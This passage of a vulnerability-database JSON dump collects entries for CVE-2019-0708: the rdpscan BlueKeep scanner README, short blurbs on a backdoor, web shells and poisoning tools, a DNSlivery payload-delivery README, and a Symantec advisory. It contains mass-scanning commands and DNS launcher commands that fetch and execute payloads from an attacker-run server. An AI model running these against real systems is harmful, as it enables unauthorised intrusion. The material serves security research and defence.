you'll see. \n \n** SAFE ** \nThere are three main reaons we think a target is safe: \n\n\n * _ SAFE - Target appears patched _ This happens when the target doesn't respond to the triggering request. This means it's a Windows system that's been patched, or a system that wasn't vulnerable to begin with, like Windows 10 or Unix. \n * _ SAFE - CredSSP/NLA required _ This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without leigitimate credentials, so cannot determine whether the target has been patched. However, hackers can't continue past this point to exploit vulnerable systems, either, so you are likely \"safe\". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it's un-patched. \n * _ SAFE - not RDP _ This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that's clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as _ UNKNOWN _ instead of _ SAFE _ / \n \n** VULNERABLE ** \nThis means we've confirmed the system is vulnerable to the bug. \n\n\n * _ VULNERABLE - got appid _ There is only one response when the system is vulnerable, this one. \n \n** UNKNOWN ** \nThere are a zillion variations for unknown \n\n\n * _ UNKNOWN - no connection - timeout _ This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it's so common that when scanning large ranges of addresses, it's usually ommited. You have to add the _ -v _ (verbose) flag in order to enable it. \n * _ UNKNOWN - no connection - refused (RST) _ This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn't running RDP, so refuses the connection with a TCP RST packet. \n * _ UNKNOWN - RDP protocol error - receive timeout _ This is the third most common response, and happens when we've successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections. \n * _ UNKNOWN - no connection - connection closed _ This means we've established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happen, which we cannot distinguish: \n * It's running RDP, but for some reason closes the connection, possibly because it's out-of-resources. \n * It's not RDP, and doesn't like the RDP request we send it, so instad of sending us a nice error message (which would trigger _ SAFE - not RDP _ ), it abruptly closes the connection. \n * Some intervening device, like an IPS, firewall, or NAT closed the connection because it identified this as hostile, or ran out of resources. \n * Some other reason I haven't identified, there's a lot of weird stuff happening when I scan the Internet. \n * _ UNKNOWN - no connection - host unreachable (ICMP error) _ The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive. \n * _ UNKNOWN - no connection - network unreachable (ICMP error) _ There is a (transient) network error on the far end, try again later if you believe that network should be running. \n * _ UNKNOWN - RDP protocol error _ This means some corruption happened in the RDP protocol, either because the remote side implents it wrong (not a Windows system), because it's handling a transient network error badly, or something else. \n * _ UNKNOWN - SSL protocol error _ Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has it's own problems like above, which includes handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it's because the other side has a bug in SSL, or your own SSL library that you are using has a bug. \n \n** Using with masscan ** \nThis ` rdpscan ` tool is fairly slow, only scanning a few hundred targets per second. You can instead use [ ` masscan ` ](<https://github.com/robertdavidgraham/masscan> \"A quick scanner for the CVE-2019-0708 BlueKeep vulnerability. \\(11\\)\" ) to speed things up. The ` masscan ` tool is roughly 1000 times faster, but only gives limited information on the target. \nThe steps are: \n\n\n * First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use). \n * Second feed the output of ` masscan ` into ` rdpscan ` , so it only has to scan targets we know are active. \nThe simple way to run this is just to combine them on the command-line: \n\n \n \n masscan 10.0.0.0/8 -p3389 | rdpscan --file -\n\nThe way I do it is in two steps: \n\n \n \n masscan 10.0.0.0/8 -p3389 > ips.txt\n rdpscan --file ips.txt --workers 10000 >results.txt\n\n \n** Building ** \nThe difficult part is getting the _ OpenSSL _ libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I've tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL. \n\n \n \n $ sudo apt install libssl-dev\n $ sudo yum install openssl-devel\n\nOnce you've solved that problem, you just compile all the ` .c ` files together like this: \n\n \n \n $ gcc *.c -lssl -lcrypto -o rdpscan\n\nI've put a Makefile in the directory that does this, so you can likely do just: \n\n \n \n $ make\n\nThe code is written in C, so needs a C [ compiler ](<https://www.kitploit.com/search/label/Compiler> \"compiler\" ) installed, such as doing the following: \n\n \n \n $ sudo apt install build-essential\n\n \n** Common build errors ** \nThis section describes the more obvious build errors. \n\n \n \n ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directory\n\nThis means you either don't have the OpensSSL headers installed, or they aren't in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn't mean you've got the development stuff installed. You need both the headers and libraries installed. \nTo install these things on Debian, do: \n\n \n \n $ sudo apt install libssl-dev\n\nTo fix the path issue, add a compilation flag ` -I/usr/local/include ` , or something similar. \nAn example linker problem is the following: \n\n \n \n Undefined symbols for architecture x86_64:\n \"_OPENSSL_init_ssl\", referenced from:\n _tcp_tls_connect in tcp-fac73c.o\n \"_RSA_get0_key\", referenced from:\n _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o\n \"_SSL_CTX_set_options\", referenced from:\n _tcp_tls_connect in tcp-fac73c.o\n \"_X509_get_X509_PUBKEY\", referenced from:\n _rdssl_cert_to_rkey in ssl-d5fdf5.o\n\nI get this on macOS because there's multiple versions of OpenSSL. I fix this by hard-coding the paths: \n\n \n \n $ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscan\n\nAccording to comments by others, the following command-line might work on macOS if you've used Homebrew to install things. I still get the linking errors above, though, because I've installed other OpenSSL components that are conflicting. \n\n \n \n gcc $(brew --prefix)/opt/openssl/lib/libssl.a $(brew --prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.c\n\n \n** Running ** \nThe section above gives quickstart tips for running the program. This section gives more in-depth help. \nTo scan a single target, just pass the address of the target: \n\n \n \n ./rdpscan 192.168.10.101\n\nYou can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be: \n\n \n \n ./rdpscan 192.168.10.101 exchange.example.com 2001:0db8:85a3::1\n\nYou can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren't supported because they are so big. \n\n \n \n ./rdpscan 10.0.0.1-10.0.0.25 192.168.0.0/16\n\nBy default, it scans only 100 targets at a time. You can increase this number with the ` --workers ` parameter. However, no matter how high you set this parameter, in practice you'll get a max of around 500 to 1500 workers running at once, depending upon your system. \n\n \n \n ./rdpscan --workers 1000 10.0.0.0/24\n\nInstead of specifying targets on the command-line, you can load them from a file instead, using the well-named ` --file ` parameter: \n\n \n \n ./rdpscan --file ips.txt\n\nThe format of the file is one address, name, or range per line. It can also consume the text generated by ` masscan ` . Extra whitespace is trimmed, blank lines ignored, any any comment lines are ignored. A _ comment _ is a line starting with the ` # ` character, or ` // ` characters. \nThe output is sent to ` stdout ` giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above. \n\n \n \n 211.101.37.250 - SAFE - CredSSP/NLA required\n 185.11.124.79 - SAFE - not RDP - SSH response seen\n 125.121.137.42 - UNKNOWN - no connection - refused (RST)\n 40.117.191.215 - SAFE - CredSSP/NLA required\n 121.204.186.182 - SAFE - CredSSP/NLA required\n 99.8.11.148 - SAFE - CredSSP/NLA required\n 121.204.186.114 - SAFE - CredSSP/NLA required\n 49.50.145.236 - SAFE - CredSSP/NLA required\n 106.12.74.155 - VULNERABLE - got appid\n 222.84.253.26 - SAFE - CredSSP/NLA required\n 144.35.133.109 - UNKNOWN - RDP protocol error - receive timeout\n 199.212.226.196 - UNKNOWN - RDP protocol error - receive timeout\n 183.134.58.152 - UNKNOWN - no connection - refused (RST)\n 83.162.246.149 - VULNERABLE - got appid\n\nYou can process this with additional unix commands like ` grep ` and ` cut ` . To get a list of just vulnerable machines: \n\n \n \n ./rdpscan 10.0.0.0/8 | grep 'VULN' | cut -f1 -d'-'\n\nThe parameter ` -dddd ` means _ diagnostic _ information, where the more ` d ` s you add, the more details are printed. This is sent to ` stderr ` instead of ` stdout ` so that you can separate the streams. Using ` bash ` this is done like this: \n\n \n \n ./rdpscan --file myips.txt -ddd 2> diag.txt 1> results.txt\n\n \n** Diagnostic info ** \nAdding the ` -d ` parameter dumps diagnostic info on the connections to ` stderr ` . \n\n \n \n ./rdpscan 62.15.34.157 -d\n \n [+] [62.15.34.157]:3389 - connecting...\n [+] [62.15.34.157]:3389 - connected from [10.1.10.133]:49211\n [+] [62.15.34.157]:3389 - SSL connection\n [+] [62.15.34.157]:3389 - version = v4.8\n [+] [62.15.34.157]:3389 - Sending MS_T120 check packet\n [-] [62.15.34.157]:3389 - Max sends reached, waiting...\n 62.15.34.157 - SAFE - Target appears patched\n\nOn macOS/Linux, you can redirect ` stdout ` and ` stderr ` separately to different files in the usual manner: \n\n \n \n ./rdpscan --file ips.txt 2> diag.txt 1> results.txt\n\n \n** SOCKS5 and Tor lulz ** \nSo it includes SOCKS5 support: \n\n \n \n ./rdpscan --file ips.txt --socks5 localhost --socks5port 9050\n\nIt makes connection problems worse so you get a lot more \"UNKNOWN\" results. \n \n** Statically link OpenSSL ** \nFor releasing the Windows and macOS binaries attached as _ releases _ to this project I statically link OpenSSL, so that it doesn't need to be included separately, and the programs _ just work _ . This section describes some notes on how to do this, especially since the description on OpenSSL's own page seems to be out of date. \nBoth these steps start with downloading the OpenSSL source and putting it next to the ` rdpscan ` directory: \n\n \n \n git clone https://github.com/openssl/openssl\n\n \n** Windows ** \nFor Windows, you need to first install some version of Perl. I use the one from [ ActiveState ](<https://www.activestate.com/ActivePerl> \"ActiveState\" ) . \nNext, you'll need a special \"assembler\". I use the recommended one called [ NASM ](<http://nasm.sourceforge.net/> \"NASM\" ) ) \nNext, you'll need a compiler. I use VisualStudio 2010. You can download the latest \"Visual Studio Community Edition\" (which is 2019) instead from Microsoft. \nNow you need to build the makefile. This is done by going into the OpenSSL directory and running the ` Configure ` Perl program: \n\n \n \n perl Configure VC-WIN32\n\nI chose 32-bit for Windows because there's a lot of old Windows out there, and I want to make the program as compaitble as possible with old versions. \nI want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from ` /MD ` (meaning use DLLs) to ` /MT ` . While I was there, I added the following to the CPPFLAGS ` -D_WIN32_WINNT=0x501 ` , which restrict OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that ` bcrypt.dll ` was not found if your run on those older systems. \nNow you'll need to make sure everything is in your path. I copied ` nasm.exe ` to the a directory in the PATH. For Visual Studio 2010, I ran the program ` vcvars32.bat ` to setup the path variables for the compiler. \nAt this point on the command-line, I typed: \n\n \n \n nmake\n\nThis makes the libraries. The static ones are ` libssl_static.lib ` and ` libcrypto_static.lib ` , which I use to link to in ` rdpscan ` . \n \n** macOS ** \nFirst of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install ` gcc ` instead. \nThen go int othe source directory for OpenSSL and create a makefile: \n\n \n \n perl Configure darwin64-x86_64-cc\n\nNow simply make it: \n\n \n \n make depend\n make\n\nAt this point, it's created both dynamic ( ` .dylib ` ) and static ( ` .lib ` ) libraries. I deleted the dynamic libraries so that it'll catch the static ones by default. \nNow in ` rdpscan ` , just build the macOS makefile: \n\n \n \n make -f Makefile.macos\n\nThis will compile all the ` rdpscan ` source files, then link to the OpenSSL libraries in the directory ` ../openssl ` that you just built. \nThis should produce a 3-megabyte exexeutable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead. \n \n \n\n\n** [ Download Rdpscan ](<https://github.com/robertdavidgraham/rdpscan> \"Download Rdpscan\" ) **\n", "edition": 9, "modified": "2019-06-19T12:32:00", "published": "2019-06-19T12:32:00", "id": "KITPLOIT:998955151150716619", "href": "http://www.kitploit.com/2019/06/rdpscan-quick-scanner-for-cve-2019-0708.html", "title": "Rdpscan - A Quick Scanner For The CVE-2019-0708 \"BlueKeep\" Vulnerability", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:35:16", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": " \n\n\n[  ](<https://1.bp.blogspot.com/-nBFEtVryKZQ/UmXHnE9md6I/AAAAAAAABHc/OdhQsG_ruZ8/s1600/sctp_camion.png>)\n\nYou may have seen, a while ago, my post on SCTP reverse shells. \n\n \n\n\nI realized quite quickly that I should definately do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use a SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also is encrypted connection. \n\n \n\n\nThe backdoor in question is \u2018TinySHell\u2019 by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later. \n\n \n\n\nAnyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it! \n\n \n\n\n \n\n\n[ ** Download TinySHell ** ](<https://github.com/infodox/tsh-sctp>)\n", "edition": 14, "modified": "2013-10-22T00:34:40", "published": "2013-10-22T00:34:40", "id": "KITPLOIT:102871766956097088", "href": "http://www.kitploit.com/2013/10/tinyshell-ported-to-sctp.html", "title": "[TinySHell] Ported to SCTP", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:33:05", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others. \n\n \n\n\n** [ Download Laudanum ](<https://sourceforge.net/projects/laudanum/>) **\n", "edition": 18, "modified": "2013-11-04T03:15:39", "published": "2013-11-04T03:15:39", "id": "KITPLOIT:6082359615438809301", "href": "http://www.kitploit.com/2013/11/laudanum-collection-of-injectable-files.html", "title": "[Laudanum] Collection of injectable files", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-09T05:23:11", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-e0paxhHNyac/XQqp5BUAP_I/AAAAAAAAPW4/NqRlJZK5We4bMj8xKnKw6nfv7FXdUpW1ACLcBGAs/s1600/DNSlivery_3_demo-target.gif>)\n\n \nEasy files and payloads delivery over DNS. \n \n** Acknowledgments ** \nThis project has been originally inspired by [ PowerDNS ](<https://github.com/mdsecactivebreach/PowerDNS> \"PowerDNS\" ) and [ Joff Thyer ](<https://twitter.com/joff_thyer> \"Joff Thyer\" ) 's technical segment on the Paul's Security Weekly podcast #590 ( [ youtu.be/CP6cIwFJswQ ](<https://youtu.be/CP6cIwFJswQ> \"youtu.be/CP6cIwFJswQ\" ) ). \n \n** Description ** \n \n** TL;DR ** \nDNSlivery allows delivering files to a target using DNS as the transport protocol. \n** Features ** : \n\n\n * allows to print, execute or save files to the target \n * does not require any client on the target \n * does not require a full-fledged DNS server \n \n** What problem are you trying to solve? ** \nEasily deliver files and/or payloads to a compromised target where classic web delivery is not possible and ** without the need for a dedicated client software ** . This applies to restricted environments where outgoing web traffic is forbidden or simply inspected by a curious web proxy. \n \n\n\n[  ](<https://1.bp.blogspot.com/-x0ICbNpRu4k/XQqqAsIstHI/AAAAAAAAPW8/rN5CfObKlz8qQfVjEqfF1TN05Cz2RZ5rQCLcBGAs/s1600/DNSlivery_4_web-delivery-blocked.png>)\n\n \nEven though more complete DNS [ tunneling ](<https://www.kitploit.com/search/label/Tunneling> \"tunneling\" ) tools already exist (s.a. [ dnscat2 ](<https://github.com/iagox86/dnscat2> \"dnscat2\" ) and [ iodine ](<https://code.kryo.se/iodine/> \"iodine\" ) ), they all require to run a dedicated client on the target. The problem is that there is probably no other way then DNS to deliver the client in such restricted environments. In other words, building a DNS communication channel with these tools require to already have a DNS communication channel. \nIn comparison, DNSlivery only provides one-way communication from your server to the target but does not require any dedicated client to do so. Thus, if you need to build a reliable two-way communication channel over DNS, use DNSlivery to deliver the client of a more advanced DNS tunneling tool to your target. \n \n** How does it work? ** \nJust like most DNS tunneling tools, DNSlivery uses ` TXT ` records to store the content of files in their base64 representation. However, it does not require to setup a full-fledged DNS server to work. Instead, it uses the [ scapy ](<https://scapy.net/> \"scapy\" ) library to listen for incoming DNS [ packets ](<https://www.kitploit.com/search/label/Packets> \"packets\" ) and craft the desired response. \n \n\n\n[  ](<https://1.bp.blogspot.com/-QclJ3myyZEo/XQqqEz5MBWI/AAAAAAAAPXA/93NUqYwQkv8Offzkopg-kmDaUFIj6n_6wCLcBGAs/s1600/DNSlivery_5_network-process.png>)\n\n \nAs most files do not fit in a single ` TXT ` record, DNSlivery will create multiple ordered records containing base64 chunks of the file. As an example, the above [ diagram ](<https://www.kitploit.com/search/label/Diagram> \"diagram\" ) illustrates the delivery of the 42 nd chunk of the file named ` file ` . \nIn order to retrieve all base64 chunks and put them back together without the need for a dedicated client on the target, DNSlivery will generate for every file: \n\n\n * a simple cleartext launcher \n * a reliable base64 encoded stager \n\n[  ](<https://1.bp.blogspot.com/-nYvVNnBPX90/XQqqJQYdpzI/AAAAAAAAPXI/JjeZ9JVhGTEmPCJfMLMImxmYfMTIDB2FgCLcBGAs/s1600/DNSlivery_6_two-stages-delivery.png>)\n\n \nThis two-stages delivery process is required to add features to the stager (s.a. handling lost DNS responses) that would otherwise not fit in a single ` TXT ` record. \n \n** Note on target compatibility ** \nCurrently, only [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) targets are supported. However, DNSlivery could be improved to support additional targets such as bash or python. Please let me know [ @no0be ](<https://twitter.com/no0be> \"@no0be\" ) if this is a feature that you would like to see being implemented. \n \n** Requirements ** \nDNSlivery does not require to build a complex server infrastructure. In fact, there are only two simple requirements: \n\n\n * be able to create a ` NS ` record in your public DNS zone \n * have a Linux server capable of receiving ` udp/53 ` traffic from the Internet \n \n** Setup ** \n \n** DNS Zone ** \nThe first step is to delegate a sub-domain to the server that will run DNSlivery by creating a new ` NS ` record in your domain. As an example, I created the following record to delegate the sub-domain ` dnsd.no0.be ` to the server at ` vps.no0.be ` . \n\n \n \n dnsd IN NS vps.no0.be.\n\nIf your zone is managed by a third-party provider, refer to their documentation to create the ` NS ` record. \n \n** DNSlivery ** \nThe only [ requirements ](<https://www.kitploit.com/search/label/Requirements> \"requirements\" ) to run DNSlivery are ` python3 ` and its ` scapy ` library. \n\n \n \n git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery\n pip install -r requirements.txt\n\n \n** Usage ** \n \n** Server ** \nDNSlivery will serve all files of a given directory ( ` pwd ` by default) and needs to be ** run with root privileges ** to listen for incoming ` udp/53 ` packets. \n\n \n \n usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver\n \n DNSlivery - Easy files and payloads delivery over DNS\n \n positional arguments:\n interface interface to listen to DNS traffic\n domain FQDN name of the DNS zone\n nameserver FQDN name of the server running DNSlivery\n \n optional arguments:\n -h, --help show this help message and exit\n -p PATH, --path PATH path of directory to serve over DNS (default: pwd)\n -s SIZE, --size SIZE size in bytes of base64 chunks (default: 255)\n -v, --verbose increase verbosity\n\n** Example ** : \n\n \n \n $ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-delivery\n \n DNSlivery - Easy files and payloads delivery over DNS\n \n [*] File \"file\" ready for delivery at file.dnsd.no0.be (7 chunks)\n [*] Listening for DNS queries...\n\n \n** Note on filename normalization ** \nAs the charset allowed for domain names is much more restrictive than for UNIX filenames (per [ RFC1035 ](<https://tools.ietf.org/html/rfc1035#section-2.3.1> \"RFC1035\" ) ), DNSlivery will perform normalization when required. \n** Example ** : \n\n \n \n [*] File \"My Awesome Powershell Script ;).ps1\" ready for delivery at my-awesome-powershell-script----ps1.dnsd.no0.be (1891 chunks)\n\n** Be aware that the current normalization code is not perfect as it does not take overlapping filenames or size limit into account. ** \n \n** Target ** \nOn the target, start by ** retrieving the launcher ** of the desired file by requesting its dedicated ` TXT ` record. The following three launchers are supported: \nAction | Launcher | Description \n---|---|--- \nPrint | ` [filename].print.[domain] ` | ( ** Default ** ) Print the delivered file to the console \nExecute | ` [filename].exec.[domain] ` | Execute the delivered file (useful for scripts) \nSave | ` [filename].save.[domain] ` | Save the delivered file to disk (useful for binaries) \n \n \n nslookup -type=txt [filename].[stager].[domain]\n\nThen, simply ** copy and paste the launcher quoted in the DNS response to a PowerShell console ** to retrieve the file on the target. \n \n** Example ** : \n\n\n[  ](<https://1.bp.blogspot.com/-fWsZsKlCbRw/XQqqQvQpRwI/AAAAAAAAPXM/21Nz9H1Ia4Qbp_jGyyqrwgcrH3YXwYMkwCLcBGAs/s1600/DNSlivery_7_demo-target.gif>)\n\n \n \n\n\n** [ Download DNSlivery ](<https://github.com/no0be/DNSlivery> \"Download DNSlivery\" ) **\n", "edition": 11, "modified": "2019-06-19T21:35:34", "published": "2019-06-19T21:35:34", "id": "KITPLOIT:7589415140458130624", "href": "http://www.kitploit.com/2019/06/dnslivery-easy-files-and-payloads.html", "title": "DNSlivery - Easy Files And Payloads Delivery Over DNS", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:54:47", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "ARPwner is a tool to do ARP poisoning and DNS poisoning attacks, with a simple GUI and a plugin system to do filtering of the information gathered, also has a implementation of sslstrip and is coded 100% in python and on Github, so you can modify according to your needs. \n\n \n\n\n[  ](<https://4.bp.blogspot.com/-Sgm2P60vxGY/US4wvZi0VaI/AAAAAAAAAQU/_EFK2MhqGXU/s1600/ARPwner.jpg>)\n\n \n \n\n\nThis tool was released by Nicolas Trippar at BlackHat USA 2012. \n\n \n\n\nFor the tool to work you need pypcap, so assuming are using a Debian derivative OS (like all sane people do) \u2013 you\u2019ll need to do this first: \n\n \n\n\n** _ apt-get install python-pypcap _ **\n\n \n\n\n \n\n\n** You can download ARPwner here: [ ARPwner.zip ](<https://github.com/ntrippar/ARPwner/archive/master.zip>) **\n\nOr read more [ here ](<https://github.com/ntrippar/ARPwner>) . \n\n \n\n", "edition": 10, "modified": "2013-02-27T16:15:33", "published": "2013-02-27T16:15:33", "id": "KITPLOIT:8309365460568193500", "href": "http://www.kitploit.com/2013/02/arpwner-arp-and-dns-poisoning-attack.html", "title": "[ARPwner] ARP and DNS Poisoning Attack Tool", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T22:31:48", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://2.bp.blogspot.com/-WbxXCxBl9Vg/UmXI7ixd3BI/AAAAAAAABHk/YdRCjR0gJ_w/s1600/scr_startuppartol.png>)\n\n \n\n\nOften may happen your PC to run a little slower than usual. Don't worry, it is nothing serious. You\u2019ve probably installed some software that delayed the boot time. \n\n** \n**\n\n** SterJo Startup Patrol ** allows you to view those files and disable them. This way you can optimize the Windows startup time but be careful not to disable some crucial programs you are using. By blocking those unneeded files the system will definitely run faster and smoother. \n\n \n\n\nThe software constantly tracks the new or modified startup registry and notifies if some changes appears. \n\n \n\n\nIf any application tries to put a startup registry on your system then the software will display the application with the following information: _ Section, Product Name, Product Description, Company, Version and Process Path _ . \n\n \n\n\nUsing the displayed information the user could disable or delete the unwanted program and prevent it from automatically running. \n\n \n\n\n** [ Download SterJo Startup Patrol v.1.3 ](<http://www.sterjosoft.com/startup-patrol.html>) **\n", "edition": 18, "modified": "2013-10-22T00:39:30", "published": "2013-10-22T00:39:30", "id": "KITPLOIT:727243444931520192", "href": "http://www.kitploit.com/2013/10/sterjo-startup-patrol-v13-disable.html", "title": "[SterJo Startup Patrol v.1.3] Disable software that delayed the boot time", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-21T09:55:08", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Web-Sorrow is a perl based tool for misconfiguration, version detection, enumeration, and server information scanning. It's entirely focused on Enumeration and collecting Info on the target server. Web-Sorrow is a \"safe to run\" program, meaning it is not designed to be an exploit or perform any harmful attacks. \n\n \n \n \n \n[ ** Download Web-Sorrow ** ](<https://code.google.com/p/web-sorrow/downloads/list>)\n", "edition": 8, "modified": "2013-02-25T23:39:04", "published": "2013-02-25T23:39:04", "id": "KITPLOIT:1049860926455958760", "href": "http://www.kitploit.com/2013/02/web-sorrow-tool-for-misconfiguration.html", "title": "[Web-Sorrow] Tool for Misconfiguration, Version Detection, Enumeration, and Server Information Scanning", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:34:02", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": " \n\n\n[  ](<https://3.bp.blogspot.com/-gR2gSxANep8/UncYIXDsa5I/AAAAAAAABKA/KhRYC9soZOI/s1600/jbrute_brute.JPG>)\n\n \n\n\nJBrute is an open source tool written in Java to audit security and stronghold of stored password for several open source and commercial apps. It is focused to provide multi-platform support and flexible parameters to cover most of the possible password-auditing scenarios. \n\nJava Runtime version 1.7 or higher is required for running JBrute. \n\n \n\n\nSupported algorithms: \n\n * MD5 \n * MD4 \n * SHA-256 \n * SHA-512 \n * MD5CRYPT \n * SHA1 \n * ORACLE-10G \n * ORACLE-11G \n * NTLM \n * LM \n * MSSQL-2000 \n * MSSQL-2005 \n * MSSQL-2012 \n * MYSQL-322 \n * MYSQL-411 \n * POSTGRESQL \n * SYBASE-ASE1502 \n * INFORMIX-1170 \n \n \n\n\n[ ** Dowload JBrute ** ](<https://sourceforge.net/projects/jbrute/>)\n", "edition": 14, "modified": "2013-11-04T03:47:13", "published": "2013-11-04T03:47:13", "id": "KITPLOIT:3245813529202482542", "href": "http://www.kitploit.com/2013/11/jbrute-open-source-security-tool-to.html", "title": "[JBrute] Open Source Security tool to audit hashed passwords", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T14:34:28", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "Retire.js is a command line scanner that helps you identify dependencies with known vulnerabilites in your application. Using the provided Grunt plugin you can easily include Retire.js into your build process. Retire.js also provides a chrome extension allowing you to detect libraries while surfing your website. \n\n \n\n\nTo detect a given version of a given component, Retire.js uses filename or URL. If that fails, it will download/open the file and look for specific comments within the file. If that also fails, there is the possibility to use hashes for minified files. And if that fails as well, the Chrome plugin will run code in a sandbox to try to detect the component and version. This last detection mechanims is not available in the command line scanner, as running arbitrary JavaScript-files in the node-process could have unwanted consequences. If anybody knows of a good way to sandbox the code on node, feel free to register and issue or contribute. \n\n \n\n\nIt's important to note that even though your site is using a vulnerable library, that does not necessarily mean your site is vulnerable. It depends on whether and how your site exercises the vulnerable code. That said, it's better to be safe than sorry. \n\n \n\n\n[ ** Download Retire.js ** ](<https://github.com/bekk/retire.js>)\n", "edition": 14, "modified": "2013-11-04T03:33:19", "published": "2013-11-04T03:33:19", "id": "KITPLOIT:3397940664053959113", "href": "http://www.kitploit.com/2013/11/retirejs-command-line-scanner-and.html", "title": "[Retire.js] Command line Scanner and Chrome plugin", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2019-05-15T01:19:50", "bulletinFamily": "software", "cvelist": ["CVE-2019-0708"], "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows Server 2003 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows XP \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-05-14T00:00:00", "published": "2019-05-14T00:00:00", "id": "SMNTC-108273", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/108273", "type": "symantec", "title": "Microsoft Windows Remote Desktop Services CVE-2019-0708 Remote Code Execution Vulnerability", "cvss": {"score": 